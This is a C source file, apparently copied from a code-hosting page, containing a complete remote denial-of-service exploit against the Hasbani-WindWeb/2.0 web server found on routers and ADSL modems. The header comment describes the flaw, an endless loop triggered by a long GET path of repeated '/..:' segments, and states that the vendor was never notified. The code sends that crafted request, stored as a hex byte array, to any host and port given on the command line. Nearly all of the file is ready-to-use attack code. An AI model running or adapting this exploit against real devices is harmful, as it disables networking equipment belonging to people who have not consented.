229 lines
No EOL
8.5 KiB
C
229 lines
No EOL
8.5 KiB
C
/*
|
|
_______ ________ .__ _____ __
|
|
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
|
|
\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ /
|
|
> <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| <
|
|
/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \
|
|
\/ \/ \/ \/ 26\09\05 \/ |__| \/ \/
|
|
|
|
[i] Title: Hasbani-WindWeb/2.0 - HTTP GET Remote DoS
|
|
[i] Discovered by: Expanders
|
|
[i] Exploit by: Expanders
|
|
|
|
[ What is Hasbani-WindWeb/2.0 ]
|
|
|
|
Hasbani server is a httpd created for menaging ethernet routers and adsl modems.
|
|
|
|
[ Why HTTPD crash? ]
|
|
|
|
Causes of DoS are not perfecly known by me 'cos i can't debug a chip-integrated http daemon.
|
|
Btw seems that Hasbani enter a loop in a GET /..:..:..etc. condition, causes that when an attacker reguest a long crafted string
|
|
server enter an endless loop with conseguenly crash of the httpd.
|
|
|
|
NOTE: This exploit DON'T drop down victim's adsl connection!
|
|
|
|
[ Timeline ]
|
|
|
|
This vulnerability was not comunicated because i did'n find Hasbani's vendor.
|
|
|
|
[ Links ]
|
|
|
|
www.x0n3-h4ck.org
|
|
|
|
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/types.h>
|
|
#include <sys/stat.h>
|
|
#include <netinet/in.h>
|
|
#include <netdb.h>
|
|
#include <unistd.h>
|
|
|
|
#define BUGSTR "GET %s HTTP/1.0\n\n\n" // Command where bug reside
|
|
|
|
|
|
char evilrequest[] = {
|
|
0x2f, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x78, 0x30, 0x6e, 0x33,
|
|
0x2d, 0x68, 0x34, 0x63, 0x6b, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
|
|
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
|
|
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
|
|
0x2e, 0x3a, 0x2e, 0x2e };
|
|
|
|
fd_set readfds;
|
|
int banner();
|
|
int usage(char *filename);
|
|
int remote_connect( char* ip, unsigned short port );
|
|
|
|
int banner() {
|
|
printf("\n _______ ________ .__ _____ __ \n");
|
|
printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n");
|
|
printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n");
|
|
printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n");
|
|
printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n");
|
|
printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n");
|
|
printf("[i] Title: \tHasbani-WindWeb/2.0 - HTTP GET Remote DoS\n");
|
|
printf("[i] Discovered by: \tExpanders\n");
|
|
printf("[i] Proof of concept by:\tExpanders\n\n");
|
|
return 0;
|
|
}
|
|
|
|
int usage(char *filename) {
|
|
printf("Usage: \t%s HOST <port> :: default HTTPD port: 80\n\n",filename);
|
|
exit(0);
|
|
}
|
|
|
|
int remote_connect( char* ip, unsigned short port )
|
|
{
|
|
int s;
|
|
struct sockaddr_in remote_addr;
|
|
struct hostent* host_addr;
|
|
|
|
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
|
|
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
|
|
{
|
|
printf ( "[X] Cannot resolve \"%s\"\n", ip );
|
|
exit ( 1 );
|
|
}
|
|
remote_addr.sin_family = AF_INET;
|
|
remote_addr.sin_port = htons ( port );
|
|
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
|
|
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
|
|
{
|
|
printf ( "[X] Socket failed!\n" );
|
|
exit(1);
|
|
}
|
|
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
|
|
{
|
|
printf ( "[X] Failed connecting!\n" );
|
|
exit(1);
|
|
}
|
|
return ( s );
|
|
}
|
|
|
|
|
|
int main(int argc, char *argv[]) {
|
|
int s,n;
|
|
unsigned int rcv;
|
|
char *request;
|
|
char recvbuf[256];
|
|
banner();
|
|
if( argc < 3)
|
|
argv[2] = "80";
|
|
else if ((atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534))
|
|
usage(argv[0]);
|
|
if( (argc < 2) )
|
|
usage(argv[0]);
|
|
request = (char *) malloc(1024);
|
|
printf("[+] Connecting to remote host\n");
|
|
s = remote_connect(argv[1],atoi(argv[2]));
|
|
sleep(1);
|
|
printf("[+] Creating buffer\n");
|
|
sprintf(request,BUGSTR,evilrequest);
|
|
printf("[+] Sending %d bytes of painfull buffer\n",strlen(evilrequest));
|
|
if ( send ( s, request, strlen (request), 0) <= 0 )
|
|
{
|
|
printf("[X] Failed to send buffer\n");
|
|
close(s);
|
|
exit(1);
|
|
}
|
|
sleep(1);
|
|
printf("[+] Done, Packet Sent\n");
|
|
close(s);
|
|
free(request);
|
|
request = NULL;
|
|
return 0;
|
|
} |